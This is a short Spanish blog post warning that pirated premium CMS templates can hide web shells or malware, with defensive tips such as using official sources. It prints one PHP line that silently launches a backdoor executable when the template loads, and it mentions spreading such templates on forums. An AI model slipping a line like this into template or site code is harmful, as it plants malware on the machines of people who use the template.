Peligros de lo gratuito – Plantillas Web

Si eres experto o principiante en diseño Web , seguramente sabrás qué es un plantilla Web. Se usa en casi todos los CMS (WordPress ,Joomla, Drupal , Smf , Magento , etc). Hay plantillas gratis ,pero a veces no son tan customizadas y atractivas como las de pago . Por eso , mucha gente busca la manera de obtener plantillas Premium gratuitamente . Pero lo que no saben es que les puede salir más caro de lo que piensan. Porque esas plantillas pueden haber sido manipuladas por otras personas . Quién sabe si entre los archivos de la plantilla , no se esconde alguna Web Shell .

c1d0784ba972

A mucha gente (incluido yo) , les gusta montar un servidor local , para  facilitar la edición de archivos o en este caso probar plantillas localmente. Sin dificultad ninguna , un pirata puede esconder algún malware entre los archivos y hacer que se ejecute al usar la plantilla , por ejemplo usando esta línea de código :

<?php
pclose(popen("start /B directorio\unbackdoor.exe", "r")); die();
?>

Hacer que alguien use esa plantilla no es nada del otro mundo , simplemente usando ingeniería social indirecta , publicándola en cualquier foro por ejemplo.

Mi recomendación es la siguiente :

– usar únicamente plantillas descargadas desde páginas oficiales
– Comprar plantillas Premium
– Descargar siempre la ultima versión
– El antivirus es el ultimo recurso , ya que el malware puede ser indetectable.

VÍDEO:


Saludos 🙂